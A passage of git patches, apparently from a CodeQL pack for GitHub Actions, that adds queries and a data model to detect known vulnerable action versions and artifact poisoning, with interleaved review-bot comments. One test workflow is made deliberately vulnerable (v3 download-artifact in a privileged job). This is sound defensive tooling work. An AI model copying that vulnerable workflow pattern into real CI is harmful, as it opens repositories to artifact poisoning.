=?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 23:02:52 +0200 Subject: [PATCH 0439/1267] refactor: Create abstract class for known vulnerable actions --- .../CWE-1395/UseOfKnownVulnerableAction.ql | 55 +++++++++++-------- .../UseOfKnownVulnerableAction.expected | 18 +++--- 2 files changed, 42 insertions(+), 31 deletions(-) diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql index 5767619a5ca..16404edc500 100644 --- a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql 
@@ -13,26 +13,37 @@ import actions +abstract class KnownVulnerableAction extends UsesStep { + abstract string getFixedVersion(); +} + +class ActionsDownloadArtifact extends KnownVulnerableAction { + ActionsDownloadArtifact() { + this.getCallee() = "actions/download-artifact" and + ( + this.getVersion() = + [ + "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", + "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", + "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", + ] + or + this.getVersion() + .matches([ + "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", + "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", + "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", + "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", + "18f0f591", "18f0f591", + ] + "%") + ) + } + + override string getFixedVersion() { result = "4.1.7" } +} + // gh api /repos/actions/download-artifact/tags --jq 'map({name: .name, sha: .commit.sha})' --paginate -from UsesStep step -where - step.getCallee() = "actions/download-artifact" and - ( - step.getVersion() = - [ - "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", - "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", - "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", - ] - or - step.getVersion() - .matches([ - "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", - "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", - "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", - "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", - "18f0f591", "18f0f591", - ] + "%") - ) -select step, "The 
workflow is using a known vulnerable version ($@) of the $@ action.", step, - step.getVersion(), step, step.getCallee() +from KnownVulnerableAction step +select step, + "The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@", step, + step.getVersion(), step, step.getCallee(), step, step.getFixedVersion() diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected index 0a8c593cd86..4749fc35817 100644 --- a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected +++ b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected 
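Review bot: `KnownVulnerableAction` and `ActionsDownloadArtifact` are declared inside the query file, so no other query can import them. The `ArtifactPoisoningPathTraversal.ql` added in the next commit on this page repeats both version lists verbatim, and the two copies will drift when a new release is added. Moving the two classes into a `.qll` under `ql/lib/codeql/actions/security/` would let that query use `ActionsDownloadArtifact` instead of a second copy. The `// gh api ...` comment is also left between the class and the `from` clause, detached from the lists it documents; it belongs directly above the `getVersion()` lists. The new message text `Update it to $@` ends without a full stop, unlike the sentence before it.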
@@ -1,9 +1,9 @@ -| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. 
| .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:17:9:18:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 87c55149d96e628cc2ef7e6fc2aab372015aec85 | .github/workflows/test1.yml:17:9:18:6 | Uses Step | actions/download-artifact | -| .github/workflows/test1.yml:18:9:19:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 9bc31d5ccc31df68ecc42ccf4149144866c47d8a | .github/workflows/test1.yml:18:9:19:6 | Uses Step | actions/download-artifact | +| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. 
Update it to $@ | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:17:9:18:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 87c55149d96e628cc2ef7e6fc2aab372015aec85 | .github/workflows/test1.yml:17:9:18:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:18:9:19:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. 
Update it to $@ | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 9bc31d5ccc31df68ecc42ccf4149144866c47d8a | .github/workflows/test1.yml:18:9:19:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 4.1.7 | From 5f1884aa32780aa6edd0aa3e4ad90fd18f705761 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 23:03:34 +0200 Subject: [PATCH 0440/1267] feat(queries): Add new queries to report path traversal via artifact poisoning --- .../CWE-829/ArtifactPoisoningPathTraversal.ql | 56 +++++++++++++++++++ .../.github/workflows/artifactpoisoning81.yml | 2 +- .../ArtifactPoisoningPathTraversal.expected | 1 + .../ArtifactPoisoningPathTraversal.qlref | 2 + 4 files changed, 60 insertions(+), 1 deletion(-) create mode 100644 ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql new file mode 100644 index 00000000000..bf7623ef260 --- /dev/null +++ b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql 
@@ -0,0 +1,56 @@
+/**
+ * @name Artifact Poisoning (Path Traversal).
+ * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps.
+ * @kind problem
+ * @problem.severity error
+ * @precision very-high
+ * @security-severity 9
+ * @id actions/artifact-poisoning/path-traversal
+ * @tags actions
+ * security
+ * experimental
+ * external/cwe/cwe-829
+ */
+
+import actions
+import codeql.actions.security.PoisonableSteps
+
+from UsesStep download
+where
+ download.getCallee() = "actions/download-artifact" and
+ download.getCallee() = "actions/download-artifact" and
+ (
+ download.getVersion() =
+ [
+ "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1",
+ "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6",
+ "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0",
+ ]
+ or
+ download
+ .getVersion()
+ .matches([
+ "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4",
+ "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e",
+ "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c",
+ "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591",
+ "18f0f591", "18f0f591",
+ ] + "%")
+ ) and
+ (
+ // exists a poisonable upload artifact in the same workflow
+ exists(UsesStep checkout, PoisonableStep poison, UsesStep upload |
+ download.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = checkout and
+ download.getEnclosingJob().isPrivilegedExternallyTriggerable() and
+ checkout.getCallee() = "actions/checkout" and
+ checkout.getAFollowingStep() = poison and
+ poison.getAFollowingStep() = upload and
+ upload.getCallee() = "actions/upload-artifact"
+ )
+ or
+ // upload artifact is not used in the same workflow
+ not exists(UsesStep upload |
+ download.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = upload
+ )
+ )
+select download, "Potential artifact poisoning" diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml index 7aa190007d8..768f244c210 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml @@ -25,7 +25,7 @@ jobs: permissions: contents: write steps: - - uses: actions/download-artifact@v4 + - uses: actions/download-artifact@v3 with: name: results - run: python test.py diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected new file mode 100644 index 00000000000..10c1cd1ded6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.expected @@ -0,0 +1 @@ +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | Potential artifact poisoning | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref new file mode 100644 index 00000000000..7082dbada27 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoningPathTraversal.ql + From 6cfec0d24574b46b9aa306547223bcff45f47439 Mon Sep 17 00:00:00 2001 
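Review bot: The second disjunct of the `where` clause, `not exists(UsesStep upload | download.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = upload)`, puts no constraint on the callee of `upload`, so for a step inside a workflow job `download` itself satisfies the `exists` and the "upload artifact is not used in the same workflow" case looks like it can never hold. Adding `and upload.getCallee() = "actions/upload-artifact"` inside that `exists` would make it match its comment. That branch also lacks the `download.getEnclosingJob().isPrivilegedExternallyTriggerable()` condition the first branch has, so once it does fire it would report unprivileged jobs as well, which sits poorly with `@precision very-high`. The conjunct `download.getCallee() = "actions/download-artifact"` is written twice and one copy can be dropped.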
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 1 Aug 2024 11:37:00 +0200 Subject: [PATCH 0441/1267] feat(queries): Improve Use Of Vulnerable Actions query Move all info to a MaD config file so its easier to mantain Add other vulnerable actions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 14 +- ql/lib/codeql/actions/config/Config.qll | 14 + .../actions/config/ConfigExtensions.qll | 7 + .../codeql/actions/dataflow/FlowSources.qll | 78 +-- .../UseOfKnownVulnerableActionQuery.qll | 23 + ql/lib/ext/config/vulnerable_actions.yml | 641 ++++++++++++++++++ ql/lib/qlpack.yml | 2 +- .../CWE-1395/UseOfKnownVulnerableAction.ql | 31 +- .../CWE-829/ArtifactPoisoningPathTraversal.ql | 23 +- ql/src/qlpack.yml | 2 +- .../UseOfKnownVulnerableAction.expected | 14 +- .../CWE-829/UnpinnedActionsTag.expected | 38 +- 12 files changed, 738 insertions(+), 149 deletions(-) create mode 100644 ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll create mode 100644 ql/lib/ext/config/vulnerable_actions.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e920a558c73..e05e3a8c41c 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1146,7 +1146,9 @@ abstract class UsesImpl extends AstNodeImpl { abstract string getVersion(); - int getMajorVersion() { result = this.getVersion().regexpReplaceAll("\\..*", "").toInt() } + int getMajorVersion() { + result = this.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() + } /** Gets the argument expression for the given key. */ string getArgument(string key) { 
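Review bot: `getMajorVersion()` has no QLDoc, and its contract matters to every caller that does a version-range check: it strips a leading `v` and everything from the first dot, then calls `toInt()`, which in general has no result when the ref is a branch name or a commit SHA. A condition such as `getMajorVersion() < N` therefore silently skips SHA-pinned and branch-pinned steps and has to be paired with an explicit SHA or model lookup. I would add `/** Gets the major version of the ref, e.g. 2 for v2.1.0; has no result for branch names and commit SHAs. */` above the predicate. The body of `UsesImpl` continues outside this hunk.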
@@ -1192,10 +1194,8 @@ class UsesStepImpl extends StepImpl, UsesImpl { else result = u.getValue() } - /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ - override string getVersion() { - result = u.getValue().regexpCapture(usesParser(), 3).regexpReplaceAll("^v", "") - } + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } override string toString() { if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" @@ -1227,12 +1227,12 @@ class ExternalJobImpl extends JobImpl, UsesImpl { u.getValue().regexpCapture(repoUsesParser(), 3) } - /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | n.lookup("uses") = name and if not name.getValue().matches("\\.%") - then result = name.getValue().regexpCapture(repoUsesParser(), 4).regexpReplaceAll("^v", "") + then result = name.getValue().regexpCapture(repoUsesParser(), 4) else none() ) } diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index efd8b26510b..fb1ae9af14d 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll 
@@ -114,3 +114,17 @@ predicate poisonableActionsDataModel(string action) { predicate untrustedEventPropertiesDataModel(string property, string kind) { Extensions::untrustedEventPropertiesDataModel(property, kind) } + +/** + * MaD models for vulnerable actions + * Fields: + * - action: action name + * - vulnerable_version: vulnerable version + * - vulnerable_sha: vulnerable sha + * - fixed_version: fixed version + */ +predicate vulnerableActionsDataModel( + string action, string vulnerable_version, string vulnerable_sha, string fixed_version +) { + Extensions::vulnerableActionsDataModel(action, vulnerable_version, vulnerable_sha, fixed_version) +} diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index 4a492edeadf..cc1b5553f5f 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -50,3 +50,10 @@ extensible predicate untrustedEventPropertiesDataModel(string property, string k extensible predicate argumentInjectionSinksDataModel( string regexp, int command_group, int argument_group ); + +/** + * Holds for actions that are known to be vulnerable. + */ +extensible predicate vulnerableActionsDataModel( + string action, string vulnerable_version, string vulnerable_sha, string fixed_version +); diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 9f91af470b2..ce211584749 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
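Review bot: The QLDoc added for `vulnerableActionsDataModel` names the four fields but not their formats, and the rows added in `vulnerable_actions.yml` show that the formats differ: `vulnerable_version` is the tag as written after `@` (mostly with the `v` prefix, e.g. `v4.1.6`), `vulnerable_sha` is the full commit SHA, and `fixed_version` is written without `v` (`4.1.7`). The consumers in this commit compare the first two with `getVersion()` by string equality, so a row in the wrong format silently never matches. I would extend the comment with `- vulnerable_version: tag as written in the workflow, including any "v" prefix` and `- vulnerable_sha: full commit SHA that the tag points to`, and give the extensible predicate in `ConfigExtensions.qll` the same field list.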
@@ -142,58 +142,14 @@ class DornyPathsFilterSource extends RemoteFlowSource { */ class TJActionsChangedFilesSource extends RemoteFlowSource { TJActionsChangedFilesSource() { - exists(UsesStep u | + exists(UsesStep u, string vulnerable_action, string vulnerable_version, string vulnerable_sha | + vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, _) and u.getCallee() = "tj-actions/changed-files" and + u.getCallee() = vulnerable_action and ( - u.getArgument("safe_output") = "false" or - u.getMajorVersion() < 41 or - u.getVersion() - .matches([ - "56284d8", "9454999", "1c93849", "da093c1", "25ef392", "18c8a4e", "4052680", - "bfc49f4", "af292f1", "56284d8", "fea790c", "95690f9", "408093d", "db153ba", - "8238a41", "4196030", "a21a533", "8e79ba7", "76c4d81", "6ee9cdc", "246636f", - "48566bb", "fea790c", "1aee362", "2f7246c", "0fc9663", "c860b5c", "2f8b802", - "b7f1b73", "1c26215", "17f3fec", "1aee362", "a0585ff", "87697c0", "85c8b82", - "a96679d", "920e7b9", "de0eba3", "3928317", "68b429d", "2a968ff", "1f20fb8", - "87e23c4", "54849de", "bb33761", "ec1e14c", "2106eb4", "e5efec4", "5817a9e", - "a0585ff", "54479c3", "e1754a4", "9bf0914", "c912451", "174a2a6", "fb20f4d", - "07e0177", "b137868", "1aae160", "5d2fcdb", "9ecc6e7", "8c9ee56", "5978e5a", - "17c3e9e", "3f7b5c9", "cf4fe87", "043929e", "4e2535f", "652648a", "9ad1a5b", - "c798a4e", "25eaddf", "abef388", "1c2673b", "53c377a", "54479c3", "039afcd", - "b2d17f5", "4a0aac0", "ce810b2", "7ecfc67", "b109d83", "79adacd", "6e426e6", - "5e2d64b", "e9b5807", "db5dd7c", "07f86bc", "3a3ec49", "ee13744", "cda2902", - "9328bab", "4e680e1", "bd376fb", "84ed30e", "74b06ca", "5ce975c", "04124ef", - "3ee6abf", "23e3c43", "5a331a4", "7433886", "d5414fd", "7f2aa19", "210cc83", - "db3ea27", "57d9664", "0953088", "0562b9f", "487675b", "9a6dabf", "7839ede", - "c2296c1", "ea251d4", "1d1287f", "392359f", "7f33882", "1d8a2f9", "0626c3f", - "a2b1e5d", "110b9ba", "039afcd", "ce4b8e3", "3b6c057", "4f64429", "3f1e44a", 
- "74dc2e8", "8356a01", "baaf598", "8a4cc4f", "8a7336f", "3996bc3", "ef0a290", - "3ebdc42", "94e6fba", "3dbb79f", "991e8b3", "72d3bb8", "72d3bb8", "5f89dc7", - "734bb16", "d2e030b", "6ba3c59", "d0e4477", "b91acef", "1263363", "7184077", - "cbfb0fd", "932dad3", "9f28968", "c4d29bf", "ce4b8e3", "aa52cfc", "aa52cfc", - "1d6e210", "8953e85", "8de562e", "7c640bd", "2706452", "1d6e210", "dd7c814", - "528984a", "75af1a4", "5184a75", "dd7c814", "402f382", "402f382", "f7a5640", - "df4daca", "602081b", "6e12407", "c5c9b6f", "c41b715", "60f4aab", "82edb42", - "18edda7", "bec82eb", "f7a5640", "28ac672", "602cf94", "5e56dca", "58ae566", - "7394701", "36e65a1", "bf6ddb7", "6c44eb8", "b2ee165", "34a865a", "fb1fe28", - "ae90a0b", "bc1dc8f", "3de1f9a", "0edfedf", "2054502", "944a8b8", "581eef0", - "e55f7fb", "07b38ce", "d262520", "a6d456f", "a59f800", "a2f1692", "72aab29", - "e35d0af", "081ee9c", "1f30bd2", "227e314", "ffd30e8", "f5a8de7", "0bc7d40", - "a53d74f", "9335416", "4daffba", "4b1f26a", "09441d3", "e44053b", "c0dba81", - "fd2e991", "2a8a501", "a8ea720", "88edda5", "be68c10", "b59431b", "68bd279", - "2c85495", "f276697", "00f80ef", "f56e736", "019a09d", "3b638a9", "b42f932", - "8dfe0ee", "aae164d", "09a8797", "b54a7ae", "902e607", "2b51570", "040111b", - "3b638a9", "1d34e69", "b86b537", "2a771ad", "75933dc", "2c0d12b", "7abdbc9", - "675ab58", "8c6f276", "d825b1f", "0bd70b7", "0fe67a1", "7bfa539", "d679de9", - "1e10ed4", "0754fda", "d290bdd", "15b1769", "2ecd06d", "5fe8e4d", "7c66aa2", - "2ecd06d", "e95bba8", "7852058", "81f32e2", "450eadf", "0e956bb", "300e935", - "fcb2ab8", "271bbd6", "e8ace01", "473984b", "032f37f", "3a35bdf", "c2216f6", - "0f16c26", "271468e", "fb063fc", "a05436f", "c061ef1", "489e2d5", "8d5a33c", - "fbfaba5", "1980f55", "a86b560", "f917cc3", "e18ccae", "e1d275d", "00f80ef", - "9c1a181", "5eaa2d8", "188487d", "3098891", "467d26c", "d9eb683", "09a8797", - "8e7cc77", "81ad4b8", "5e2a2f1", "1af9ab3", "55a857d", "62a9200", "b915d09", - "f0751de", "eef9423" - 
] + "%") + u.getArgument("safe_output") = "false" + or + (u.getVersion() = vulnerable_version or u.getVersion() = vulnerable_sha) ) and this.asExpr() = u ) @@ -207,24 +163,14 @@ class TJActionsChangedFilesSource extends RemoteFlowSource { */ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { TJActionsVerifyChangedFilesSource() { - exists(UsesStep u | + exists(UsesStep u, string vulnerable_action, string vulnerable_version, string vulnerable_sha | + vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, _) and u.getCallee() = "tj-actions/verify-changed-files" and + u.getCallee() = vulnerable_action and ( - u.getArgument("safe_output") = "false" or - u.getMajorVersion() < 17 or - u.getVersion() - .matches([ - "54e20d3", "a9b6fd3", "30aa174", "7f1b21c", "54e20d3", "0409e18", "7da22d0", - "7016858", "0409e18", "7517b83", "bad2f5d", "3b573ac", "7517b83", "f557547", - "9ed3155", "f557547", "a3391b5", "a3391b5", "1d7ee97", "c432297", "6e986df", - "fa6ea30", "6f40ee1", "1b13d25", "c09bcad", "fda469d", "bd1e271", "367ba21", - "9dea97e", "c154cc6", "527ff75", "e8756d5", "bcb4e76", "25267f5", "ea24bfd", - "f2a40ba", "197e121", "a8f1b11", "95c26dd", "97ba4cc", "68310bb", "720ba6a", - "cedd709", "d68d3d2", "2e1153b", "c3dd635", "81bd1de", "31a9c74", "e981d37", - "e7f801c", "e86d0b9", "ad255a4", "3a8aed1", "de910b5", "d31b2a1", "e61c6fc", - "380890d", "873cfd6", "b0c60c8", "7183183", "6555389", "9828a95", "8150cee", - "48ddf88" - ] + "%") + u.getArgument("safe_output") = "false" + or + (u.getVersion() = vulnerable_version or u.getVersion() = vulnerable_sha) ) and this.asExpr() = u ) diff --git a/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll b/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll new file mode 100644 index 00000000000..bbb021fe3d5 --- /dev/null +++ b/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll 
@@ -0,0 +1,23 @@
+import actions
+import codeql.actions.config.Config
+
+class KnownVulnerableAction extends UsesStep {
+ string vulnerable_action;
+ string fixed_version;
+ string vulnerable_version;
+ string vulnerable_sha;
+
+ KnownVulnerableAction() {
+ vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, fixed_version) and
+ this.getCallee() = vulnerable_action and
+ (this.getVersion() = vulnerable_version or this.getVersion() = vulnerable_sha)
+ }
+
+ string getFixedVersion() { result = fixed_version }
+
+ string getVulnerableAction() { result = vulnerable_action }
+
+ string getVulnerableVersion() { result = vulnerable_version }
+
+ string getVulnerableSha() { result = vulnerable_sha }
+}
diff --git a/ql/lib/ext/config/vulnerable_actions.yml b/ql/lib/ext/config/vulnerable_actions.yml
new file mode 100644
index 00000000000..eb452983bfc
--- /dev/null
+++ b/ql/lib/ext/config/vulnerable_actions.yml
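Review bot: `KnownVulnerableAction` binds `vulnerable_version` and `vulnerable_sha` as fields from whichever model row matches, and several rows in `vulnerable_actions.yml` share one SHA (for example `v3.0.2` and `v3` of `actions/download-artifact`). For a SHA-pinned step `getVulnerableVersion()` therefore has more than one result, and a query that selects it would presumably report the same step once per tag. The class and its four getters also have no QLDoc. I would add `/** A uses step whose action and ref (tag or full commit SHA) match a row of vulnerableActionsDataModel. */` on the class, and a comment on `getVulnerableVersion()` saying it may return several tags when the step is pinned by SHA.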
@@ -0,0 +1,641 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: vulnerableActionsDataModel + data: + + # gh api /repos/actions/download-artifact/tags --jq 'map({name: .name, sha: .commit.sha})' --paginate | jq -r '.[] | "- \"\(.name)\", \"\(.sha)\""' + + # + # actions/download-artifact + - ["actions/download-artifact", "v4.1.6", "9c19ed7fe5d278cd354c7dfd5d3b88589c7e2395", "4.1.7"] + - ["actions/download-artifact", "v4.1.5", "8caf195ad4b1dee92908e23f56eeb0696f1dd42d", "4.1.7"] + - ["actions/download-artifact", "v4.1.4", "c850b930e6ba138125429b7e5c93fc707a7f8427", "4.1.7"] + - ["actions/download-artifact", "v4.1.3", "87c55149d96e628cc2ef7e6fc2aab372015aec85", "4.1.7"] + - ["actions/download-artifact", "v4.1.2", "eaceaf801fd36c7dee90939fad912460b18a1ffe", "4.1.7"] + - ["actions/download-artifact", "v4.1.1", "6b208ae046db98c579e8a3aa621ab581ff575935", "4.1.7"] + - ["actions/download-artifact", "v4.1.0", "f44cd7b40bfd40b6aa1cc1b9b5b7bf03d3c67110", "4.1.7"] + - 